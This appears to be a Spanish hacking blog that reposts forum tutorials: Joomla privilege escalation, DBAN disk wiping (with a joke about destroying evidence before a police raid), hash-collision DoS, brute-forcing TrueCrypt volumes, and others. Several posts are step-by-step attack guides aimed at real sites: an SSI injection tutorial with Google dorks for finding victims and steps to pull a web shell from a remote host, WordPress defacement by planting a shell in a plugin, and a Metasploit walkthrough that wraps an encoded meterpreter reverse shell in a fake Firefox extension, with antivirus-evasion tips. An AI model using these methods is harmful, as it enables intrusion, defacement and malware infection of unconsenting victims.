Banner 1

Escalada de Privilegios en Joomla a través de un Registro

0 comentarios
Bueno , En este video tutorial explico como realizar una escalada de privilegios a webs joomla con versiones 1.6 , 1.7 y 2.5 mediante un registro.


Saludos , Sanko
Fuente:http://underc0de.org/foro/bugs-y-exploits/escalada-de-privilegios-en-joomla-a-traves-de-un-registro-sanko/

Borra tu disco de forma rápida y segura con DBAN

0 comentarios
 
Hace tiempo ya hablamos de Active@ Kill Disk para el borrado seguro (wipe) del disco, tarea común y necesaria cuando nos desprendemos de un viejo portátil de trabajo o un disco duro extraíble. Juanma Merino, a través de un comentario en ese post, nos mencionó DBAN, que es de código abierto y gratuito y que para él (y para mucha gente) es la herramienta estándar "de facto" para el borrado seguro.

Desde entonces tengo en la bolsa del portátil un viejo pendrive de 64MB (basta con uno de 32) y lo utilizo antes de entregar mi viejo equipo
al pesado de Sistemas (esto ocurre una vez cada lustro más o menos) o cuando recibimos un "chivatazo" y queremos destruir todas las evidencias antes de la inminente incursión en "nuestro sótano" de las Fueras de Seguridad del Estado... XD

Para estos casos, si queremos algo rápido y de emergencia, os recomiendo conectar el pendrive a vuestro equipo, configurar el boot para que inicie primero por USB, arrancar DBAN y utilizar la opción autonuke que borrará automáticamente todos los discos de vuestro sistema (¡incluso el dispositivo extraible si no lo extraes antes del "wipeo" correspondiente!). Además, si mal no recuerdo, este método es bastante seguro ya que tiene una entropía urandom (linux), utiliza DoD y realiza tres pasadas.

Así que, si tu también quieres tener un viejo pendrive a mano con DBAN, no hay nada más fácil:

1. Descarga dban-2.2.6_i586.iso
2. Descarga y ejecuta Universal USB Installer, selecciona del desplegable la opción DBAN 2.2.6 y sigue las instrucciones.

En conclusión, DBAN es una solución muy válida para casa o para el trabajo, aunque en este último caso esta distribución no certifica la destrucción de los datos, por lo que no sería válida en entornos corporativos con datos sensibles que requieran este tipo de certificaciones. No obstante soporta un amplio abanico de modelos de discos SATA, IDE y SCSI y puede utilizar los métodos DoD Short, DoD 5220-22.M, Gutmann y Pseudo-Random Number Generation (PRNG).

Fuente:http://www.hackplayers.com/2012/06/borra-tu-disco-de-forma-rapida-y-segura.html

Ghost: un honeypot para malware que se propaga mediante dispositivos USB

0 comentarios

Ghost es un proyecto de código abierto que implementa un honeypot para el malware que se propaga mediante dispositivos USB. Se trata de un proyecto desarrollado por Sebastian Poeplau para una tesis de licenciatura en la Universidad de Bonn en Alemania y ahora su desarrollo continua en Honeynet Project.

Básicamente el honeypot simula ser un dispositivo de almacenamiento USB esperando que el equipo sea infectado por el malware que utiliza este vector de propagación.

Por el momento, Ghost sólo es compatible con Windows XP de 32 bits. Se encuentra en una etapa temprana de desarrollo y se puede descargar una distribución binaria o compilar el código. Si optas por esta última opción necesitarás el kit de controladores de Windows y encontrarás instrucciones detalladas para hacerlo en su wiki.


Fuente:http://www.hackplayers.com/2012/06/ghost-un-honeypot-para-malware-que-se.html

Ataques DoS efectivos mediante colisiones de hashes

0 comentarios
 
Durante la conferencia 28c3 (28th Chaos Communication Congress) de finales del año pasado en Berlín, Alexander “alech” Klink y Julian “zeri” Wälde ofrecieron una interesante charla titulada "Ataques de denegación de servicio eficientes sobre plataformas de aplicaciones web". En ella hablan de ataques basados en colisiones de hashes que causan fácilmente pérdidas de servicio en un gran porcentaje de aplicaciones web.

Pero, ¿en qué consisten estos ataques?. Muchas aplicaciones web automáticamente recogen los parámetros de cada petición y los pegan en un hash de pares de claves para aumentar el rendimiento y la velocidad. La idea es "colisionar" estos hashes mediante peticiones http post para que el servidor objetivo consuma una gran cantidad de CPU al procesarlos.

Si un atacante es capaz de entender los valores usados en el algoritmo de hashing puede pre-calcular un conjunto de valores de hashes que den como resultado el mismo. Comparar estos hashes se convierte en una función cuadrática que puede crear una carga muy pesada en el servidor web.

Por ejemplo, enviar aproximadamente dos megabytes de valores que computan el mismo hash provoca que el servidor tenga que comparar más de 40 billones de strings. Wow!

Es fácil encontrar estas colisiones en lenguages que no aleatorizan las funciones de hashing: node.js/v8, php, python, ASP, ruby, java, etc. Sólo unos pocos se salvan, como cruby (1.9 ~2008) o perl (5.8.1 ~2003). De hecho se comenzó esta investigación a partir de la FAQ de seguridad de Perl (perldoc perlsec) en la que se habla de un fallo de seguridad en versiones anteriores a la 5.8.1, que permitían ataques de colisiones de hashes. Podéis encontrar los lenguajes y versiones afectas y parcheadas aquí.

Y finalmente, ¿cómo puedo explotar esta vulnerabilidad? Pues existe una herramienta escrita en Java que puede ayudar a comprobar fácilmente si nuestro servidor es vulnerable: PostTester. Eso sí, la versión gratuita está limitada sólo a direccionamiento privado (127.0.0.x, 10.xxx, 172.16.xx a 172.31.xx y 192.168.xx).


 Fuente: http://www.hackplayers.com/2012/05/ataques-dos-efectivos-mediante.html


Subir Shell a través de Inyección SSI (Server-side include)

0 comentarios

¿Qué es SSI?

Inyección SSI (Server Side Include) es una técnica de explotación de servidor que permite a un atacante enviar código a una aplicación web, que posteriormente será ejecutado localmente por el servidor web. Inyección de código SSI explota el fracaso de una aplicación web para desinfectar los datos suministrados por el usuario antes de que se insertan en un server-side interpretada archivo HTML.

Si un atacante envía un Server-Side Include, él puede tener la capacidad de ejecutar comandos del sistema operativo, o incluir el contenido de un archivo restringido la próxima vez que se sirve de la página.


Empecemos.

Paso I - Encontrar un Sitio Vulnerable:

El mejor Dork que he encontrado es inurl:bin/Cklb/ entonces lo escribimos en Google y vamos ir probando...

Paso II - Probando el Sitio Vulnerable:

Cuando usamos la Dork  iremos probando web por web para identificar si el sitio es vulnerable a este tipo de inyección...

¿Como identifico si el sitio es vulnerable?

Ejecutando estos simple comandos:


Mostrara la Fecha


Mostrara que el usuario se esta ejecutando en el servidor (Windows)


(Linux)
Mostrara todos los archivos en el directorio

(Windows)
Mostrara todos los archivos en el directorio
Nota: Tenemos que utilizar las etiquetas
  cuando ejecutamos algun comando.

Ejemplo: 



Entonces tomamos uno de los comandos y lo insertamos en los cuadros de búsqueda o campos de inicio de sesión.

Los campos de inicio de sesión en su mayoría son vulnerables.

Sitio Vulnerable, ejemplo

Lo primero que haremos es ejecutar el comando en los campos como mencione lineas arriba, entonces esto deberia de quedar asi:



& nos devolverá todos los archivos del directorio....



Ahora vemos que nuestro comando se ejecutado con éxito y que el sitio es vulnerable ....

Paso II - Subiendo la Shell:

Como ya sabemos que el sitio web es vulnerable, entonces ya estamos listos para crear una shell.

En primer lugar tenemos que tener la shell en un .TXT y la subimos a cualquier host o nuestro host propio, ejemplo:

www.sitio-web.com/shell.txt

Ahora tenemos que descargar la shell con el siguiente comando:


Ahora sólo pegamos en el campo y pulsamos Entrar o Intro.



Para ver si el archivo en .TXT se ha descargado, tenemos que ejecutar el comando que usamos antes para listar los directorios:




En este caso yo he colocado config1.txt ustedes pueden utilizar cualquier nombre



Entonces si vemos que se ha descargado correctamente, ahora solo debemos cambiar el nombre de .Txt  a .Php, utilizando el siguiente comando:


Ahora, tenemos que listar nuevamente todos los archivos y tratar de encontrar la shell, en este caso se mostrara como config.php



Ahora, como ya sabemos que la shell esta en formato php, solo nos faltaria entrar a dicho archivo desde el navegador:


& Voila tenemos nuestra shell....


Les dejare algunas dorks:

inurl:bin/Cklb/ - Best Dork
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=

Espero que hayas aprendido algo...

Saludos.

Fuente:http://underc0de.org/foro/bugs-y-exploits/subir-shell-a-traves-de-inyeccion-ssi-%28server-side-include%29/

Atacando a un Wordpress

0 comentarios
Bueno cuando hacer symlink o sacas algun tipo de inyección en un plugin de wordpress o le meter keylogger y le sacas el pass del wordpress algunos no saben como defacear el wordpress yo les voy a enseñar una forma o un par de formas mejor dicho de como los defaceamos...





Ya estamos en el panel de administración ahora veamos arriba del número 3 dice howdy admin al lado dice New Post ahi demos click


veremos algo parecido a esto:





lo que está señalado en rojo le damos click, osea donde dice html y agregamos este código:


Código: HTML
  1. <META HTTP-EQUIV="Refresh" CONTENT="3; URL=http://underc0de.org">

donde dice underc0de.org cambienlo por la url donde esté su index... esta es una opcion ustedes hagan su html puede ser un iframe quizás o con lo que ustedes deseen, un javascript derrepente... lo que hacemos básicamente es crear un post con un contenido de redirección para al entrar al wordpress redireccione a nuestro index.



La otra manera es mas interesante...


Vemos que en la imagen en la parte 1 aparece un boton llamado plugins:




le damos click y veremos algo como esto:




pongan editar y aparecerá algo asi:




editamos ese php y ponemos el código de nuestra shell ahora ponemos Save File y...

luego ingresamos a:

http://web.com/wp-content/plugins/akismet/akismet.php


Es Tu shell verdad?

Luego cambias el index del wordpress y ya OWNED!



Espero que Se haya entendido es bien fácil y pues no hagan lammeradas...



Saludos,
Dedalo

Fuente: http://underc0de.org/foro/bugs-y-exploits/defaceando-a-un-wordpress/msg35645/?topicseen#new

Java Fake a una Red LAN [Infectando con Troyano en LAN]

0 comentarios


Esta es una demostracion de como se puede conseguir infectar con un troyano a una PC que este en tu misma LAN y asi conseguir el control total sobre un PC.
Para esta demostracion se ha utilizado un PC atacante con win7 [192.168.1.34] y otro victima con winVista [192.168.1.37]

Se crea un servidor con tu pagina de java facke y se redirecciona a tu victima para que cuando quiera conectarse a una pagina [en este caso google] se le envie tu facke y se infecte.
Fuente:http://underc0de.org/foro/hacking-basico/java-facke-a-una-red-lan-%28infectando-con-troyano-en-lan%29/

TrueCrack (Crackeo por fuerza bruta a TrueCrypt)

0 comentarios

¿QUÉ ES TrueCrack?
TrueCrack es una galleta de la contraseña por fuerza bruta para los archivos de volumen TrueCrypt (Copyrigth). Funciona en Linux y que se ha optimizado con la tecnología NVIDIA CUDA.
Se trabaja con volúmenes cripted con los siguientes algoritmos:

PBKDF2 (definido en PKCS5 v2.0) con base en función de derivación de RIPEMD160 Key.
Bloque de modo de cifrado XTS de la operación utilizada para el cifrado de disco duro basado en AES.

TrueCrack puede funcionar en dos modos diferentes de uso:

El ataque del diccionario: leer las contraseñas desde un archivo de palabras (una contraseña para la línea).
Ataque Charset: generar las contraseñas de un juego de caracteres de los símbolos definidos por el usuario (por ejemplo: todas las cadenas posibles de n caracteres desde el juego de caracteres "abc").

Cómo ejecutar?

Diccionario ataque de un archivo de lista de palabras:

. / Truecrack-t-w TRUECRYPT_VOLUME WORDLIST_FILE-b 1024
Charset ataque de un alfabeto (por ejemplo, ABC) con la longitud máxima (32) para la palabra:
. / Truecrack-t TRUECRYPT_VOLUME-c abc-m 32-b 1024

OPCIONES DE EJECUCIÓN:

Nota: el argumento de bloque es directamente proporcional al número de bloques de la cuadrícula cuda paralelas y el número de contraseña calculada. Un valor de 10 a de bloque de parámetro significa que hay 10 bloques de cuda que se ejecutan en paralelo, cada bloque comprueba y verifica una sola contraseña. Así que 10 bloques de 10 significa que la contraseña calcula en paralelo. Este valor se establece por defecto para el número de núcleos de la actual junta directiva de nvidia (el máximo es de 65.536 para la 1.xy 2.x arquitecturas CUDA), si la GPU es desactivar, de bloque se establece en 1024 por defecto.


Cómo compilar?

TrueCrack puede trabajar en la CPU o la GPU modos.
Si desea que la optimización de Cuda, se establece la variable de la GPU en la verdad:
que la GPU = true
Porque si usted desea utilizar sólo el recurso de la CPU, se establece la variable de la GPU en falso:
que la GPU = false
Asegúrese de que ha realizado correctamente instalar y configurar nvidia cuda marco de su sistema. Usted puede encontrar una breve guía en la sección de descargas.

RENDIMIENTO:

Tiempo total de ejecución de un ataque de diccionario de 10.000 palabras con una longitud media de palabra: 10 caracteres.
CPU en Modo de:

-> Sistema: Intel Core i7-920, 2,67 GHz
-> Tiempo total: 11m 01,1 s

GPU modo de:

-> Consejo: nVidia GeForce GTX470
-> Tiempo total: 0m 30.425 s

LICENCIA:

TrueCrack es un software de código abierto bajo GNU Public License versión 3. Este software está basado en TrueCrypt, disponible gratuitamente en: http://www.truecrypt.org/

Descargar: http://code.google.com/p/truecrack/
Fuente: http://underc0de.org/foro/hacking-basico/truecrack-%28crackeo-por-fuerza-bruta-a-truecrypt%29/

Hacking Website Using Flasm

0 comentarios

Flasm es un ensamblador/desensamblador de código de bytes de ActionScript para Flash. Usando Flasm, autores de scripts pueden aprender actionscript compilador y Flash Player.

Flasm desmonta el SWF completo, incluyendo todas las líneas de tiempo y eventos. En cuanto a desmontaje, a aprender cómo funciona el compilador de Flash, lo que mejora sus habilidades de ActionScript. Usted también puede hacer algunas optimizaciones en el código desmontados a mano o ajustar el código que desee. Flasm a continuación, aplica los cambios en el SWF original, en sustitución de las acciones originales. También es posible integrar las acciones Flasm en el código ActionScript.

Ubicacion:
Aplicaciones - Backtrack - Reverse-Engineering - Flasm

Abriendo desde la Terminal:

root@TioSam:~# cd /pentest/reverse-engineering
root@TioSam:/pentest/reverse-engineering# ls
flasm ida-pro-free ollydbg rec-studio
root@TioSam:/pentest/reverse-engineering# cd flasm
root@TioSam:/pentest/reverse-engineering/flasm# ls
CHANGES.TXT classic.css flasm flasm.html flasm.ini LICENSE.TXT logo.gif
root@TioSam:/pentest/reverse-engineering/flasm# ./flasm

Demostracion:

Descargar:

Fuente:
http://underc0de.org/foro/hacking-basico/hacking-website-using-flasm/

Comprometiendo un equipo mediante una extension de Firefox falsa

0 comentarios
Mediante ingeniería social intentaremos que un usuario instale una extensión de Firefox falsa para obtener una sesión remota en su sistema.

A través del módulo de Metasploit firefox_xpi_bootstrapped_addon, crearemos un fichero .xpi que será presentado a la víctima dentro de una página web. Cuando el usuario la visite, su navegador Firefox le preguntará si confía y desea instalar la extensión. Si el usuario hace clic en 'instalar' se ejecutará el payload con los permisos del usuario.

Haremos una simple demostración contra un Windows XP SP3.

1. Primero abrimos la consola de metasploit (msfconsole), actualizamos y cargamos el módulo correspondiente:



msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf  exploit(firefox_xpi_bootstrapped_addon) >

2. Ahora procedemos a configurar el addon:


msf  exploit(firefox_xpi_bootstrapped_addon) > set addonname falso
addonname => falso
msf  exploit(firefox_xpi_bootstrapped_addon) > set SRVHOST 192.168.1.35
SRVHOST => 192.168.1.35
msf  exploit(firefox_xpi_bootstrapped_addon) > set SRVPORT 80
SRVPORT => 80
msf  exploit(firefox_xpi_bootstrapped_addon) > set URIPATH fakeEx
URIPATH => fakeEx
msf  exploit(firefox_xpi_bootstrapped_addon) > set LHOST 192.168.1.35
LHOST => 192.168.1.35

3. A continuación preparamos nuestro payload para intentar que el AV no lo detecte. Primero con msfvenom:


D:\metasploit4>ruby\bin\ruby.exe msf3\msfvenom --payload windows/meterpreter/reverse_tcp --format exe --encoder x86/shikata_ga_nai --iterations 10 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c LHOST=192.168.1.35 > trojan.exe
[*] x86/jmp_call_additive succeeded with size 321 (iteration=1)
[*] x86/jmp_call_additive succeeded with size 353 (iteration=2)
[*] x86/jmp_call_additive succeeded with size 385 (iteration=3)
[*] x86/jmp_call_additive succeeded with size 417 (iteration=4)
[*] x86/jmp_call_additive succeeded with size 449 (iteration=5)

Luego tendréis que utilizar también otro crypter si queréis que vuestro payload sea lo más FuD posible... así que no cuesta nada modificar un stub y utilizar alguno de esos tan sexys que hay en la Red ;)

Después cargamos el payload para nuestro módulo:

msf  exploit(firefox_xpi_bootstrapped_addon) > set PAYLOADFILE d:\\metasploit4\\trojan.exe
PAYLOADFILE => d:\metasploit4\trojan.exe
payload => windows/meterpreter/reverse_tcp

Y lanzamos el exploit:


msf  exploit(firefox_xpi_bootstrapped_addon) > exploit
[*] Exploit running as background job.
msf  exploit(firefox_xpi_bootstrapped_addon) >
[*] Started reverse handler on 192.168.1.35:4444
[*] Using URL: http://192.168.1.35:80/fakeEx
[*] Server started.

4. Ahora que tenemos todo funcionando sólo necesitamos que el usuario visite nuestra URL (correo, MITM, DNS, ...) y que instale la extensión falsa de Firefox:


msf  exploit(firefox_xpi_bootstrapped_addon) >
[*] 192.168.1.35     firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...


Si cae en la trampa, obtendremos la sesión remota:



[*] Sending stage (752128 bytes) to 192.168.1.35
[*] Meterpreter session 1 opened (192.168.1.35:4444 -> 192.168.1.35:15831) at 2012-05-28 19:11:57 +0200

msf  exploit(firefox_xpi_bootstrapped_addon) > sessions -i

Active sessions
===============

  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   meterpreter x86/win32               192.168.1.35:4444 -> 192.168.1.35:15831 (192.168.1.35)

Fuente:
http://underc0de.org/foro/hacking-basico/comprometiendo-un-equipo-mediante-una-extension-de-firefox-falsa/

Problemas con las imagines

0 comentarios
Buenos días.

Este post es para saber si las pocas personas que leen este blog conocen alguna solución a las imágenes cortadas o sobrepuestas en los post que se publican.

La idea no es editarlos manualmente ya que seria tedioso, lo ideal es encontrar la forma para que blogspot adapte las imágenes automaticamente o por lo menos la plantilla lo acepte.

Si conocen alguna forma me lo pueden comunicar :).


Quedo atento

Saludos roboticos.
Powered by Bad Robot
Helped by Blackubay